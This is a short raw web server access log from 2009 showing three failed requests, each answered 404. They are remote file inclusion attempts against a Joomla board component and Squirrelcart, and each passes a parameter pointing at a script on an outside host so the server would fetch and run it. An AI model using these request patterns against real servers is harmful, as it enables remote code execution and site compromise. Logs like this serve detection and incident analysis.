218.150.79.146 - - [28/Apr/2009:11:50:47 -0700] "GET /logs/access_081112.log/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:50:47 -0700] "GET /logs/access_080829.log/components/com_joomlaboard/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:50:52 -0700] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
